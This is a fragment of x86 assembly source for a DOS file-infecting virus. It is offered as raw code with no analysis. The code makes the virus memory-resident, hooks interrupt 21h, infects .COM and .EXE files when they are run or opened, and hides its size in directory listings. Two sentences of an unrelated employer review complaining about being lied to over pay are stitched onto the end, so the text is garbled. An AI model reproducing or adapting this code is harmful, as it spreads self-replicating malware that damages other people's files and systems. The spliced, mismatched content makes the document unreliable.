inc bx
dec dx
jnz decrypt
virus_code:
call $ + 3 ; BP is instruction ptr.
pop bp
sub bp,offset $ - 1
push ds es
mov ax,PING ; test for residency
int 21h
cmp bx,PONG
je installed
mov ax,es ; Get PSP
dec ax
mov ds,ax ; Get MCB
sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
mov es,word ptr ds:[12h]
push cs ; copy virus into memory
pop ds
xor di,di
mov si,bp
mov cx,(virus_end - start) / 2 + 1
rep movsw
xor ax,ax ; capture interrupts
mov ds,ax
sub word ptr ds:[413h],(MEM_SIZE+1023) / 1024
mov si,21h * 4 ; get original int 21
mov di,offset old_int_21
movsw
movsw
mov word ptr ds:[si - 4],offset new_int_21
mov ds:[si - 2],es ; and set new int 21
installed:
call activate ; activation routine
pop es ds ; restore segregs
cmp sp,MARKER ; check for .EXE
je exe_exit
com_exit:
lea si,[bp + host] ; restore host program
mov di,100h
push di
movsw
movsb
call fix_regs ; fix up registers
ret ; and leave
exe_exit:
mov ax,ds ; fix up return address
add ax,10h
add ax,cs:[bp + exe_cs]
mov cs:[bp + return_cs],ax
mov ax,cs:[bp + exe_ip]
mov cs:[bp + return_ip],ax
mov sp,[bp + exe_sp] ; restore SP
call fix_regs ; fix up registers
db 0EAh ; back to host program
return_ip dw 0
return_cs dw 0
exe_cs dw -16 ; orig CS:IP
exe_ip dw 103h
exe_sp dw -2 ; orig SP
fix_regs:
xor ax,ax
cwd
xor bx,bx
mov si,100h
xor di,di
ret
; interrupt 21 handler
int_21:
pushf
call dword ptr cs:[old_int_21]
ret
new_int_21:
cmp ax,PING ; residency test
je ping_pong
cmp ax,4B00h ; execute program
je execute
cmp ah,3Dh ; file open
je file_open
cmp ah,11h ; directory stealth
je dir_stealth
cmp ah,12h
je dir_stealth
int_21_exit:
db 0EAh ; never mind ...
old_int_21 dd 0
ping_pong:
mov bx,PONG
iret
dir_stealth:
call int_21 ; get dir entry
test al,al
js dir_stealth_done
push ax bx es
mov ah,2Fh
int 21h
cmp byte ptr es:[bx],-1 ; check for extended FCB
jne no_ext_FCB
add bx,7
no_ext_FCB:
mov ax,es:[bx + 17h] ; check for infection marker
and al,31
cmp al,STAMP
jne dir_fixed
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
sbb word ptr es:[bx + 1Fh],0
dir_fixed:
pop es bx ax
dir_stealth_done:
iret
file_open:
push ax cx di es
call get_extension
cmp [di],'OC' ; .COM file?
jne perhaps_exe ; perhaps .EXE then
cmp byte ptr [di + 2],'M'
jne not_prog
jmp a_program
perhaps_exe:
cmp [di],'XE' ; .EXE file?
jne not_prog
cmp byte ptr [di + 2],'E'
jne not_prog
a_program:
pop es di cx ax
jmp execute ; infect file
not_prog:
pop es di cx ax
jmp int_21_exit
execute:
push ax bx cx dx si di ds es
xor ax,ax ; critical error handler
mov es,ax ; routine - catch int 24
mov es:[24h * 4],offset int_24
mov es:[24h * 4 + 2],cs
mov ax,4300h ; change attributes
int 21h
push cx dx ds
xor cx,cx
call set_attributes
mov ax,3D02h ; open file
call int_21
jc cant_open
xchg bx,ax
push cs ; CS = DS
pop ds
mov ax,5700h ; save file date/time
int 21h
push cx dx
mov ah,3Fh
mov cx,28
mov dx,offset read_buffer
int 21h
cmp word ptr read_buffer,'ZM' ; .EXE?
je infect_exe ; yes, infect as .EXE
mov al,2 ; move to end of file
call move_file_ptr
cmp dx,65279 - (VIRUS_SIZE + 3)
ja dont_infect ; too big, don't infect
sub dx,VIRUS_SIZE + 3 ; check for previous infection
This company mis informed about the pay and what it actually does to get me to come in for an interview. Nothing but lies.
Good thing I did research and asked the right questions, I just don't understand why they lied to me over the phone. Don't be fooled is right.